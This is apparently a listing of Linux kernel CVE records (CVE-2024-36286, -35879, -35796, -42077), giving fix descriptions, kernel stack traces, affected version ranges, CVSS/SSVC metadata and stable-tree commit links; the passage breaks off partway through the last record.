                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.25",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()\n\nsyzbot reported that nf_reinject() could be called without rcu_read_lock() :\n\nWARNING: suspicious RCU usage\n6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0 Not tainted\n\nnet/netfilter/nfnetlink_queue.c:263 suspicious rcu_dereference_check() usage!\n\nother info that might help us debug this:\n\nrcu_scheduler_active = 2, debug_locks = 1\n2 locks held by syz-executor.4/13427:\n  #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:329 [inline]\n  #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2190 [inline]\n  #0: ffffffff8e334f60 (rcu_callback){....}-{0:0}, at: rcu_core+0xa86/0x1830 kernel/rcu/tree.c:2471\n  #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: spin_lock_bh include/linux/spinlock.h:356 [inline]\n  #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: nfqnl_flush net/netfilter/nfnetlink_queue.c:405 [inline]\n  #1: ffff88801ca92958 (\u0026inst-\u003elock){+.-.}-{2:2}, at: instance_destroy_rcu+0x30/0x220 net/netfilter/nfnetlink_queue.c:172\n\nstack backtrace:\nCPU: 0 PID: 13427 Comm: syz-executor.4 Not tainted 6.9.0-rc7-syzkaller-02060-g5c1672705a1a #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/02/2024\nCall Trace:\n \u003cIRQ\u003e\n  __dump_stack lib/dump_stack.c:88 [inline]\n  dump_stack_lvl+0x241/0x360 lib/dump_stack.c:114\n  lockdep_rcu_suspicious+0x221/0x340 kernel/locking/lockdep.c:6712\n  nf_reinject net/netfilter/nfnetlink_queue.c:323 [inline]\n  nfqnl_reinject+0x6ec/0x1120 net/netfilter/nfnetlink_queue.c:397\n  nfqnl_flush net/netfilter/nfnetlink_queue.c:410 [inline]\n  instance_destroy_rcu+0x1ae/0x220 net/netfilter/nfnetlink_queue.c:172\n  rcu_do_batch kernel/rcu/tree.c:2196 [inline]\n  rcu_core+0xafd/0x1830 kernel/rcu/tree.c:2471\n  handle_softirqs+0x2d6/0x990 kernel/softirq.c:554\n  __do_softirq kernel/softirq.c:588 [inline]\n  invoke_softirq kernel/softirq.c:428 [inline]\n  __irq_exit_rcu+0xf4/0x1c0 kernel/softirq.c:637\n  irq_exit_rcu+0x9/0x30 kernel/softirq.c:649\n  instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1043 [inline]\n  sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1043\n \u003c/IRQ\u003e\n \u003cTASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:11:03.459Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8658bd777cbfcb0c13df23d0ea120e70517761b9"
        },
        {
          "url": "https://git.kernel.org/stable/c/3989b817857f4890fab9379221a9d3f52bf5c256"
        },
        {
          "url": "https://git.kernel.org/stable/c/e01065b339e323b3dfa1be217fd89e9b3208b0ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/25ea5377e3d2921a0f96ae2551f5ab1b36825dd4"
        },
        {
          "url": "https://git.kernel.org/stable/c/68f40354a3851df46c27be96b84f11ae193e36c5"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f365564af898819a523f1a8cf5c6ce053e9f718"
        },
        {
          "url": "https://git.kernel.org/stable/c/215df6490e208bfdd5b3012f5075e7f8736f3e7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/dc21c6cc3d6986d938efbf95de62473982c98dec"
        }
      ],
      "title": "netfilter: nfnetlink_queue: acquire rcu_read_lock() in instance_destroy_rcu()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36286",
    "datePublished": "2024-06-21T10:18:08.364Z",
    "dateReserved": "2024-06-21T10:13:16.315Z",
    "dateUpdated": "2025-11-04T17:21:08.764Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35879 (GCVE-0-2024-35879)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 12:55

Title

of: dynamic: Synchronize of_changeset_destroy() with the devlink removals

Summary

In the Linux kernel, the following vulnerability has been resolved: of: dynamic: Synchronize of_changeset_destroy() with the devlink removals In the following sequence: 1) of_platform_depopulate() 2) of_overlay_remove() During the step 1, devices are destroyed and devlinks are removed. During the step 2, OF nodes are destroyed but __of_changeset_entry_destroy() can raise warnings related to missing of_node_put(): ERROR: memory leak, expected refcount 1 instead of 2 ... Indeed, during the devlink removals performed at step 1, the removal itself releasing the device (and the attached of_node) is done by a job queued in a workqueue and so, it is done asynchronously with respect to function calls. When the warning is present, of_node_put() will be called but wrongly too late from the workqueue job. In order to be sure that any ongoing devlink removals are done before the of_node destruction, synchronize the of_changeset_destroy() with the devlink removals.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3127b2ee50c424a96…
	https://git.kernel.org/stable/c/3ee2424107546d882…
	https://git.kernel.org/stable/c/7b6df050c45a1ea15…
	https://git.kernel.org/stable/c/801c8b8ec5bfb3519…
	https://git.kernel.org/stable/c/ae6d76e4f06c37a62…
	https://git.kernel.org/stable/c/8917e7385346bd658…

Impacted products

Vendor

Product

Version

Linux

Affected: d007150b4e15bfcb8d36cfd88a5645d42e44d383 , < 3127b2ee50c424a96eb3559fbb7b43cf0b111c7a (git)
Affected: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f , < 3ee2424107546d882e1ddd75333ca9c32879908c (git)
Affected: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f , < 7b6df050c45a1ea158fd50bc32a8e1447dd1e951 (git)
Affected: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f , < 801c8b8ec5bfb3519566dff16a5ecd48302fca82 (git)
Affected: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f , < ae6d76e4f06c37a623e357e79d49b17411db6f5c (git)
Affected: 80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f , < 8917e7385346bd6584890ed362985c219fe6ae84 (git)
Affected: 252c23915546863685ecc68cb3a39e7e80c6c9d4 (git)

Linux

Affected: 5.13
Unaffected: 0 , < 5.13 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35879",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T15:13:02.160768Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:31.403Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.046Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3127b2ee50c424a96eb3559fbb7b43cf0b111c7a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ee2424107546d882e1ddd75333ca9c32879908c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7b6df050c45a1ea158fd50bc32a8e1447dd1e951"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/801c8b8ec5bfb3519566dff16a5ecd48302fca82"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae6d76e4f06c37a623e357e79d49b17411db6f5c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8917e7385346bd6584890ed362985c219fe6ae84"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/of/dynamic.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3127b2ee50c424a96eb3559fbb7b43cf0b111c7a",
              "status": "affected",
              "version": "d007150b4e15bfcb8d36cfd88a5645d42e44d383",
              "versionType": "git"
            },
            {
              "lessThan": "3ee2424107546d882e1ddd75333ca9c32879908c",
              "status": "affected",
              "version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
              "versionType": "git"
            },
            {
              "lessThan": "7b6df050c45a1ea158fd50bc32a8e1447dd1e951",
              "status": "affected",
              "version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
              "versionType": "git"
            },
            {
              "lessThan": "801c8b8ec5bfb3519566dff16a5ecd48302fca82",
              "status": "affected",
              "version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
              "versionType": "git"
            },
            {
              "lessThan": "ae6d76e4f06c37a623e357e79d49b17411db6f5c",
              "status": "affected",
              "version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
              "versionType": "git"
            },
            {
              "lessThan": "8917e7385346bd6584890ed362985c219fe6ae84",
              "status": "affected",
              "version": "80dd33cf72d1ab4f0af303f1fa242c6d6c8d328f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "252c23915546863685ecc68cb3a39e7e80c6c9d4",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/of/dynamic.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.42",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.12.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: dynamic: Synchronize of_changeset_destroy() with the devlink removals\n\nIn the following sequence:\n  1) of_platform_depopulate()\n  2) of_overlay_remove()\n\nDuring the step 1, devices are destroyed and devlinks are removed.\nDuring the step 2, OF nodes are destroyed but\n__of_changeset_entry_destroy() can raise warnings related to missing\nof_node_put():\n  ERROR: memory leak, expected refcount 1 instead of 2 ...\n\nIndeed, during the devlink removals performed at step 1, the removal\nitself releasing the device (and the attached of_node) is done by a job\nqueued in a workqueue and so, it is done asynchronously with respect to\nfunction calls.\nWhen the warning is present, of_node_put() will be called but wrongly\ntoo late from the workqueue job.\n\nIn order to be sure that any ongoing devlink removals are done before\nthe of_node destruction, synchronize the of_changeset_destroy() with the\ndevlink removals."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:59.140Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3127b2ee50c424a96eb3559fbb7b43cf0b111c7a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ee2424107546d882e1ddd75333ca9c32879908c"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b6df050c45a1ea158fd50bc32a8e1447dd1e951"
        },
        {
          "url": "https://git.kernel.org/stable/c/801c8b8ec5bfb3519566dff16a5ecd48302fca82"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae6d76e4f06c37a623e357e79d49b17411db6f5c"
        },
        {
          "url": "https://git.kernel.org/stable/c/8917e7385346bd6584890ed362985c219fe6ae84"
        }
      ],
      "title": "of: dynamic: Synchronize of_changeset_destroy() with the devlink removals",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35879",
    "datePublished": "2024-05-19T08:34:36.450Z",
    "dateReserved": "2024-05-17T13:50:33.111Z",
    "dateUpdated": "2025-05-04T12:55:59.140Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35796 (GCVE-0-2024-35796)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2025-05-04 12:55

Title

net: ll_temac: platform_get_resource replaced by wrong function

Summary

In the Linux kernel, the following vulnerability has been resolved: net: ll_temac: platform_get_resource replaced by wrong function The function platform_get_resource was replaced with devm_platform_ioremap_resource_byname and is called using 0 as name. This eventually ends up in platform_get_resource_byname in the call stack, where it causes a null pointer in strcmp. if (type == resource_type(r) && !strcmp(r->name, name)) It should have been replaced with devm_platform_ioremap_resource.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6d9395ba7f85bdb7a…
	https://git.kernel.org/stable/c/553d294db94b5f139…
	https://git.kernel.org/stable/c/46efbdbc95a30951c…
	https://git.kernel.org/stable/c/476eed5f1c2203477…
	https://git.kernel.org/stable/c/7e9edb569fd9f688d…
	https://git.kernel.org/stable/c/92c0c29f667870f17…
	https://git.kernel.org/stable/c/3a38a829c8bc27d78…

Impacted products

Vendor

Product

Version

Linux

Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 6d9395ba7f85bdb7af0b93272e537484ecbeff48 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 553d294db94b5f139378022df480a9fb6c3ae39e (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 46efbdbc95a30951c2579caf97b6df2ee2b3bef3 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 476eed5f1c22034774902a980aa48dc4662cb39a (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 7e9edb569fd9f688d887e36db8170f6e22bafbc8 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 92c0c29f667870f17c0b764544bdf22ce0e886a1 (git)
Affected: bd69058f50d5ffa659423bcfa6fe6280ce9c760a , < 3a38a829c8bc27d78552c28e582eb1d885d07d11 (git)
Affected: 77c8cfdf808410be84be56aff7e0e186b8c5a879 (git)

Linux

Affected: 5.9
Unaffected: 0 , < 5.9 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35796",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-31T18:39:44.232878Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:22:51.425Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.618Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/xilinx/ll_temac_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6d9395ba7f85bdb7af0b93272e537484ecbeff48",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "553d294db94b5f139378022df480a9fb6c3ae39e",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "46efbdbc95a30951c2579caf97b6df2ee2b3bef3",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "476eed5f1c22034774902a980aa48dc4662cb39a",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "7e9edb569fd9f688d887e36db8170f6e22bafbc8",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "92c0c29f667870f17c0b764544bdf22ce0e886a1",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "lessThan": "3a38a829c8bc27d78552c28e582eb1d885d07d11",
              "status": "affected",
              "version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "77c8cfdf808410be84be56aff7e0e186b8c5a879",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/xilinx/ll_temac_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.8.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ll_temac: platform_get_resource replaced by wrong function\n\nThe function platform_get_resource was replaced with\ndevm_platform_ioremap_resource_byname and is called using 0 as name.\n\nThis eventually ends up in platform_get_resource_byname in the call\nstack, where it causes a null pointer in strcmp.\n\n\tif (type == resource_type(r) \u0026\u0026 !strcmp(r-\u003ename, name))\n\nIt should have been replaced with devm_platform_ioremap_resource."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:46.667Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
        },
        {
          "url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
        },
        {
          "url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
        },
        {
          "url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
        },
        {
          "url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
        }
      ],
      "title": "net: ll_temac: platform_get_resource replaced by wrong function",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35796",
    "datePublished": "2024-05-17T13:23:07.558Z",
    "dateReserved": "2024-05-17T12:19:12.339Z",
    "dateUpdated": "2025-05-04T12:55:46.667Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42077 (GCVE-0-2024-42077)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2025-11-03 22:01

Title

ocfs2: fix DIO failure due to insufficient transaction credits

Summary

In the Linux kernel, the following vulnerability has been resolved: ocfs2: fix DIO failure due to insufficient transaction credits The code in ocfs2_dio_end_io_write() estimates number of necessary transaction credits using ocfs2_calc_extend_credits(). This however does not take into account that the IO could be arbitrarily large and can contain arbitrary number of extents. Extent tree manipulations do often extend the current transaction but not in all of the cases. For example if we have only single block extents in the tree, ocfs2_mark_extent_written() will end up calling ocfs2_replace_extent_rec() all the time and we will never extend the current transaction and eventually exhaust all the transaction credits if the IO contains many single block extents. Once that happens a WARN_ON(jbd2_handle_buffer_credits(handle) <= 0) is triggered in jbd2_journal_dirty_metadata() and subsequently OCFS2 aborts in response to this error. This was actually triggered by one of our customers on a heavily fragmented OCFS2 filesystem. To fix the issue make sure the transaction always has enough credits for one extent insert before each call of ocfs2_mark_extent_written(). Heming Zhao said: ------ PANIC: "Kernel panic - not syncing: OCFS2: (device dm-1): panic forced after error" PID: xxx TASK: xxxx CPU: 5 COMMAND: "SubmitThread-CA" #0 machine_kexec at ffffffff8c069932 #1 __crash_kexec at ffffffff8c1338fa #2 panic at 